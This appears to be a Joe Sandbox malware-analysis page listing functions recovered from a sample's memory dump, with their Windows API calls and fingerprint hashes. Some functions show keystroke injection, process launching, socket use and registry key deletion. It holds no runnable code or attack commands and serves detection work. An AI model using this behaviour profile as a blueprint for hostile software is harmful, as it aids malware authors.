Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: c9435b84f2a3b4f89018690fdf7d3766dea61aa494efa0426950e1c7e8ba1fb0
Instruction ID: c042ccd36a2cb4ab83eb06c3a757e1383defac4cefcecb2741af1f5c8d09106e
Opcode Fuzzy Hash: c9435b84f2a3b4f89018690fdf7d3766dea61aa494efa0426950e1c7e8ba1fb0
Instruction Fuzzy Hash: 99B17AB1A00215EBDF14CF68C9857FE7BB1BF04711F08817AEC589B295D738A994CB98

Function 00392A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,003CC1C7,00000004,00000000,00000000,00000000), ref: 00392ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,003CC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00392B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,003CC1C7,00000004,00000000,00000000,00000000), ref: 003CC21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,003CC1C7,00000004,00000000,00000000,00000000), ref: 003CC286

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 4bbeeb409dc72a47ef1be66cf0eefd3513e94f0cbaaa80aec78e3751cb426b76
Instruction ID: f8b2772e96b1a321d6fa1d17a68f3a063ed7792084f2ee4f19fbea46a52c9ef8
Opcode Fuzzy Hash: 4bbeeb409dc72a47ef1be66cf0eefd3513e94f0cbaaa80aec78e3751cb426b76
Instruction Fuzzy Hash: 9641FC32618F80BACF379B29CC8CB7B7B95AB55310F15C82DE04786961CA75AC46D710

Function 003F70C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 003F70DD

Part of subcall function 003B0DB6: std::exception::exception.LIBCMT ref: 003B0DEC
Part of subcall function 003B0DB6: __CxxThrowException@8.LIBCMT ref: 003B0E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 003F7114
EnterCriticalSection.KERNEL32(?), ref: 003F7130
_memmove.LIBCMT ref: 003F717E
_memmove.LIBCMT ref: 003F719B
LeaveCriticalSection.KERNEL32(?), ref: 003F71AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003F71BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 003F71DE

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: c2dbe81589c2cf8d1224a01e01027e705af0d9217090a976152f71c4c0b4c835
Instruction ID: 72996a1bd308ede380edfa49c9fa618caadbfd4f8dd059f39e4db1f4edafa3e6
Opcode Fuzzy Hash: c2dbe81589c2cf8d1224a01e01027e705af0d9217090a976152f71c4c0b4c835
Instruction Fuzzy Hash: 27317E31A00205EBCF01DFA4DC85AAFB778EF45310F1481B9EA04AB246DB30DE15CBA4

Function 004161D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 004161EB
GetDC.USER32(00000000), ref: 004161F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004161FE
ReleaseDC.USER32(00000000,00000000), ref: 0041620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00416246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00416257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0041902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00416291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004162B1

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 71ccef50dfb26347920f97af660729aaff230f6dcf3e6f7fd2e94f2006f1c0e7
Instruction ID: 5ad6d53688d358abc60bf087938642774e5b338c007c6292437d30418b436ea5
Opcode Fuzzy Hash: 71ccef50dfb26347920f97af660729aaff230f6dcf3e6f7fd2e94f2006f1c0e7
Instruction Fuzzy Hash: BB316D72101210BFEF118F50DC8AFEB3BA9EF49765F054065FE089A291C6759C46CB68

Function 003EBBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 003EBBC4
_memcmp.LIBCMT ref: 003EBBE6
_memcmp.LIBCMT ref: 003EBBFE
_memcmp.LIBCMT ref: 003EBC11
_memcmp.LIBCMT ref: 003EBC2B
_memcmp.LIBCMT ref: 003EBC3E
_memcmp.LIBCMT ref: 003EBC56
_memcmp.LIBCMT ref: 003EBC71

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 99fab9310a9180576ef3daa644a9d1869a973c6e2b4a1dbc0e9ea58b05df4c7e
Instruction ID: 5a6f677a757906d2abecab960bbbd28e075765d52d10a4eeed760c8bb61c3aca
Opcode Fuzzy Hash: 99fab9310a9180576ef3daa644a9d1869a973c6e2b4a1dbc0e9ea58b05df4c7e
Instruction Fuzzy Hash: A4210A6170427677E2076613AE52FFBF36C9E1038CF644511FE045AAC3EBA4DE10C1A5

Function 003FEB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00399837: __itow.LIBCMT ref: 00399862
Part of subcall function 00399837: __swprintf.LIBCMT ref: 003998AC

Part of subcall function 003AFC86: _wcscpy.LIBCMT ref: 003AFCA9

_wcstok.LIBCMT ref: 003FEC94
_wcscpy.LIBCMT ref: 003FED23
_memset.LIBCMT ref: 003FED56

Strings

X, xrefs: 003FED93

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 461209f6d430ad0fc413825f643ef0d307dac332b95a0453e8a673582faf6308
Instruction ID: 711796f870d67f7f19bd7288c91eb3f692545d7ee3035180c2cd4bdc6813c190
Opcode Fuzzy Hash: 461209f6d430ad0fc413825f643ef0d307dac332b95a0453e8a673582faf6308
Instruction Fuzzy Hash: F1C182715087449FDB26EF24C881E6AB7E4FF85310F11492DF9999B2A2DB70EC45CB82

Function 00406B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00406C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00406C21
WSAGetLastError.WSOCK32(00000000), ref: 00406C34
htons.WSOCK32(?,?,?,00000000,?), ref: 00406CEA
inet_ntoa.WSOCK32(?), ref: 00406CA7

Part of subcall function 003EA7E9: _strlen.LIBCMT ref: 003EA7F3
Part of subcall function 003EA7E9: _memmove.LIBCMT ref: 003EA815

_strlen.LIBCMT ref: 00406D44
_memmove.LIBCMT ref: 00406DAD

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: a965b89438f89764aa45f0d1a19a72420733c71bf5405fe7125c5fdb9fd25ea5
Instruction ID: b9a4e1d0dec028ea57ae446f094a441c4c4e6c68ee37dc49cbc9ae98c507578d
Opcode Fuzzy Hash: a965b89438f89764aa45f0d1a19a72420733c71bf5405fe7125c5fdb9fd25ea5
Instruction Fuzzy Hash: CF81B371204200ABDB11EB24CC82F6BB7E8AF85714F10492EF956AF2D2DB74ED05C796

Function 00391424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a772b37583ad88e1f65d1691b3b161d0624546236c1e774e3f4cf4edd3bd559
Instruction ID: c12e4c3227fd5e4009a8ee323cf73f36cada6b09d0342d93aaa89aa765c31447
Opcode Fuzzy Hash: 3a772b37583ad88e1f65d1691b3b161d0624546236c1e774e3f4cf4edd3bd559
Instruction Fuzzy Hash: C0717D3090010AEFDF06DF99CC89EBEBB79FF89310F218159F915AA251C730AA51CB64

Function 0041B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(012E61C0), ref: 0041B3EB
IsWindowEnabled.USER32(012E61C0), ref: 0041B3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0041B4DB
SendMessageW.USER32(012E61C0,000000B0,?,?), ref: 0041B512
IsDlgButtonChecked.USER32(?,?), ref: 0041B54F
GetWindowLongW.USER32(012E61C0,000000EC), ref: 0041B571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0041B589

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 808f9d511cb62a2764543541c8c9645d8baf401bb66d9811943862e68c155e0a
Instruction ID: 199454eb7395cd62f89273eadf2e3e86d741682ea029bb05e30bea1e6a20c994
Opcode Fuzzy Hash: 808f9d511cb62a2764543541c8c9645d8baf401bb66d9811943862e68c155e0a
Instruction Fuzzy Hash: 2B719E38600604EFDB21DF55C894FFB7BB9EF09310F14806AE955973A2C739A891CB98

Function 0040F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040F448
_memset.LIBCMT ref: 0040F511
ShellExecuteExW.SHELL32(?), ref: 0040F556

Part of subcall function 00399837: __itow.LIBCMT ref: 00399862
Part of subcall function 00399837: __swprintf.LIBCMT ref: 003998AC

Part of subcall function 003AFC86: _wcscpy.LIBCMT ref: 003AFCA9

GetProcessId.KERNEL32(00000000), ref: 0040F5CD
CloseHandle.KERNEL32(00000000), ref: 0040F5FC

Strings

@, xrefs: 0040F525

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: e52ec2d1bbd00c3085a5f7adf9c7817899cc5275e41d44bea7f6a326bc997c04
Instruction ID: c8120aef579a6c99a4a530475131d9adc08f4cbccafbb7c84e38df83f4197f63
Opcode Fuzzy Hash: e52ec2d1bbd00c3085a5f7adf9c7817899cc5275e41d44bea7f6a326bc997c04
Instruction Fuzzy Hash: B6619C71A006189FCF15DF68C881AAEB7B5FF49310F10807EE819AB791CB34AD45CB84

Function 003F0F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 003F0F8C
GetKeyboardState.USER32(?), ref: 003F0FA1
SetKeyboardState.USER32(?), ref: 003F1002
PostMessageW.USER32(?,00000101,00000010,?), ref: 003F1030
PostMessageW.USER32(?,00000101,00000011,?), ref: 003F104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 003F1095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 003F10B8

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 0fb4c108f1d23f7c8e51c69ee9d14776fa408e915bd94078de101d27ea6f1684
Instruction ID: b34f03e5c38fcbfe25bb272e25e5e8dbed60f961a8ab698db5fa0f621ac0382b
Opcode Fuzzy Hash: 0fb4c108f1d23f7c8e51c69ee9d14776fa408e915bd94078de101d27ea6f1684
Instruction Fuzzy Hash: C25115A05047DABDFB3742388C05BB6BFA95B06304F098589E3D5898D3C6D9DCC9D751

Function 003F0D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 003F0DA5
GetKeyboardState.USER32(?), ref: 003F0DBA
SetKeyboardState.USER32(?), ref: 003F0E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 003F0E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 003F0E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 003F0EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 003F0EC9

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 7525f4d857464bab0a53045eca93a2d1709f5f3168655c615f5062696e0d86b3
Instruction ID: c15f945bc78ec3c04f5fdfd4dc6e7fdf8e5c34457c596d2cd3a45138ca034a26
Opcode Fuzzy Hash: 7525f4d857464bab0a53045eca93a2d1709f5f3168655c615f5062696e0d86b3
Instruction Fuzzy Hash: 665109A06447D97DFB3B83788C45BBABFA95B06300F088899F2D45A8C3C395EC98D750

Function 003F55FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 003F560A
_wcsncpy.LIBCMT ref: 003F563F
_wcsncpy.LIBCMT ref: 003F5671
_wcsncpy.LIBCMT ref: 003F56A4
_wcsncpy.LIBCMT ref: 003F56E6
_wcsncpy.LIBCMT ref: 003F5720
_wcsncpy.LIBCMT ref: 003F574F

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: c78992a299d426a1123de4fd563185437c7f40380326d18f257d15750b2b7b03
Instruction ID: 448b279c29a89179733c3a1defba383cbef95e0c3ba2aee03141baf711a0c9ae
Opcode Fuzzy Hash: c78992a299d426a1123de4fd563185437c7f40380326d18f257d15750b2b7b03
Instruction Fuzzy Hash: 6041C265C1021876CB13FBF48C869DFB3B89F05314F508A66E718E7621EB34A245C7EA

Function 003ED56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 003ED5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 003ED60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003ED61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 003ED69D

Strings

DllGetClassObject, xrefs: 003ED610
,,B, xrefs: 003ED578

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: ,,B$DllGetClassObject
API String ID: 753597075-3467126366
Opcode ID: 4217aab0d9f5c0719a42e975aa6109c439ef880803ba5b39fd24554dd822b2f2
Instruction ID: c66b0f14126cbff519f1a7f3347bcf3faeb8c3f3f11b27622346221a9b5c100e
Opcode Fuzzy Hash: 4217aab0d9f5c0719a42e975aa6109c439ef880803ba5b39fd24554dd822b2f2
Instruction Fuzzy Hash: 7441B1B1600264EFDB06CF65C884B9ABBB9EF44310F5582ADEC099F285D7B1DD44CBA4

Function 003F3671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 003F466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003F3697,?), ref: 003F468B

Part of subcall function 003F466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003F3697,?), ref: 003F46A4

lstrcmpiW.KERNEL32(?,?), ref: 003F36B7
_wcscmp.LIBCMT ref: 003F36D3
MoveFileW.KERNEL32(?,?), ref: 003F36EB
_wcscat.LIBCMT ref: 003F3733
SHFileOperationW.SHELL32(?), ref: 003F379F

Strings

\*.*, xrefs: 003F372D

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 8ef50c7c0a28f7fe525bd761bdfa18395e38df820d4fb806e20015bbabf5c5aa
Instruction ID: 27ecab3429fda8535884ff94686ccf0da25dba775d7f156610ceaadef3cdfa70
Opcode Fuzzy Hash: 8ef50c7c0a28f7fe525bd761bdfa18395e38df820d4fb806e20015bbabf5c5aa
Instruction Fuzzy Hash: FA418171508348AECB53EF64C4819EF77E8AF89340F00092EB599C7251EB34D689C756

Function 00417291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004172AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00417351
IsMenu.USER32(?), ref: 00417369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004173B1
DrawMenuBar.USER32 ref: 004173C4

Strings

0, xrefs: 0041729E

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 72465eecb09dea97b0d3974d146d7be0630631b17a4c300311d3282cd40f6c9c
Instruction ID: a99a7b4267a95c70056ab1001fa84c567c97cda7025e336fec5d5d6609e434cd
Opcode Fuzzy Hash: 72465eecb09dea97b0d3974d146d7be0630631b17a4c300311d3282cd40f6c9c
Instruction Fuzzy Hash: EE411575A04208EFDB20DF50D884AEABBB9FB08350F14852AFD25AB351D734AD94DB64

Function 00410FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00410FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00410FFE
FreeLibrary.KERNEL32(00000000), ref: 004110B5

Part of subcall function 00410FA5: RegCloseKey.ADVAPI32(?), ref: 0041101B
Part of subcall function 00410FA5: FreeLibrary.KERNEL32(?), ref: 0041106D
Part of subcall function 00410FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00411090

RegDeleteKeyW.ADVAPI32(?,?), ref: 00411058

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
